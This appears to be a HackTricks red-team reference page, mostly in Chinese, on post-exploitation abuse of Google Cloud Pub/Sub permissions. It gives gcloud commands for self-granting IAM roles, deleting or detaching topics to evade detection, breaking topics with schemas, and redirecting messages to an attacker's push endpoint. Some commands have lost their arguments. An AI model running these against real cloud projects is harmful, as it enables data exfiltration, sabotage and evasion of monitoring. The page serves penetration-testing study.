GCP - Pub/Sub Post Exploitation

Tip

学习并练习 AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
学习并练习 GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
学习并练习 Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

支持 HackTricks

Pub/Sub

有关 Pub/Sub 的更多信息,请查看以下页面:

GCP - Pub/Sub Enum

pubsub.topics.publish

在主题中发布消息, useful to 发送意外数据 并触发意外功能或利用漏洞:

向主题发布消息 ```bash # Publish a message in a topic gcloud pubsub topics publish --message "Hello!" ```

pubsub.topics.detachSubscription

可用于阻止订阅接收消息,可能用于避免被检测。

从主题分离订阅 ```bash gcloud pubsub topics detach-subscription ```

pubsub.topics.delete

可用于阻止订阅接收消息,可能用于规避检测。
即使有订阅附着在主题上,也可以删除该主题。

删除主题 ```bash gcloud pubsub topics delete ```

pubsub.topics.update

使用此权限可更新主题的某些设置以使其中断,例如 --clear-schema-settings, --message-retention-duration, --message-storage-policy-allowed-regions, --schema, --schema-project, --topic-encryption-key

pubsub.topics.setIamPolicy

为自己赋予执行之前任何攻击的权限。

# Add Binding
gcloud pubsub topics add-iam-policy-binding <TOPIC_NAME> \
--member="serviceAccount:<SA_NAME>@<PROJECT_ID>.iam.gserviceaccount.com" \
--role="<ROLE_OR_CUSTOM_ROLE>" \
--project="<PROJECT_ID>"

# Remove Binding
gcloud pubsub topics remove-iam-policy-binding <TOPIC_NAME> \
--member="serviceAccount:<SA_NAME>@<PROJECT_ID>.iam.gserviceaccount.com" \
--role="<ROLE_OR_CUSTOM_ROLE>" \
--project="<PROJECT_ID>"

# Change Policy
gcloud pubsub topics set-iam-policy <TOPIC_NAME> \
<(echo '{
"bindings": [
{
"role": "<ROLE_OR_CUSTOM_ROLE>",
"members": [
"serviceAccount:<SA_NAME>@<PROJECT_ID>.iam.gserviceaccount.com"
]
}
]
}') \
--project=<PROJECT_ID>

pubsub.subscriptions.create,pubsub.topics.attachSubscription , (pubsub.subscriptions.consume)

在 web 服务器上获取所有消息:

创建 push subscription 以接收消息 ```bash # Crete push subscription and recieve all the messages instantly in your web server gcloud pubsub subscriptions create --topic --push-endpoint https:// ```

创建一个 subscription 并用它来 pull messages

创建 pull subscription 并检索 messages ```bash # This will retrive a non ACKed message (and won't ACK it) gcloud pubsub subscriptions create --topic

You also need pubsub.subscriptions.consume for this

gcloud pubsub subscriptions pull

This command will wait for a message to be posted

</details>

### `pubsub.subscriptions.delete`

**删除订阅** 可能有助于中断日志处理系统或类似系统:

<details>

<summary>删除订阅</summary>
```bash
gcloud pubsub subscriptions delete <FULL SUBSCRIPTION NAME>

pubsub.subscriptions.update

使用此权限更新某些设置,使消息存储在你可以访问的位置(URL, Big Query table, Bucket),或只是用来中断它。

更新订阅端点 ```bash gcloud pubsub subscriptions update --push-endpoint ```

pubsub.subscriptions.setIamPolicy

为自己授予执行之前提到的任何攻击所需的权限。

pubsub.schemas.attach, pubsub.topics.update,(pubsub.schemas.create)

将 schema 附加到 topic,使消息无法满足该 schema,从而导致 topic 中断。
如果没有任何 schema,你可能需要创建一个。

Create schema file and attach to topic ```json:schema.json { "namespace": "com.example", "type": "record", "name": "Person", "fields": [ { "name": "name", "type": "string" }, { "name": "age", "type": "int" } ] } ``` 
# Attach new schema
gcloud pubsub topics update projects/<project-name>/topics/<topic-id> \
--schema=projects/<project-name>/schemas/<topic-id> \
--message-encoding=json

pubsub.schemas.delete

这看起来像是删除一个 schema 后你将能够发送不符合该 schema 的 messages。然而,由于 schema 会被删除,实际上不会有 message 进入该 topic。因此这是无用

删除 schema(无用) ```bash gcloud pubsub schemas delete ```

pubsub.schemas.setIamPolicy

为自己授予执行之前提到的任何攻击所需的权限。

pubsub.snapshots.create, pubsub.snapshots.seek

这将为所有未 ACK(unACKed)的消息创建一个快照并将它们放回订阅。对攻击者来说不是很有用,但这里是:

创建快照并定位到该快照 ```bash gcloud pubsub snapshots create YOUR_SNAPSHOT_NAME \ --subscription=YOUR_SUBSCRIPTION_NAME gcloud pubsub subscriptions seek YOUR_SUBSCRIPTION_NAME \ --snapshot=YOUR_SNAPSHOT_NAME ```

Tip

学习并练习 AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
学习并练习 GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
学习并练习 Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

支持 HackTricks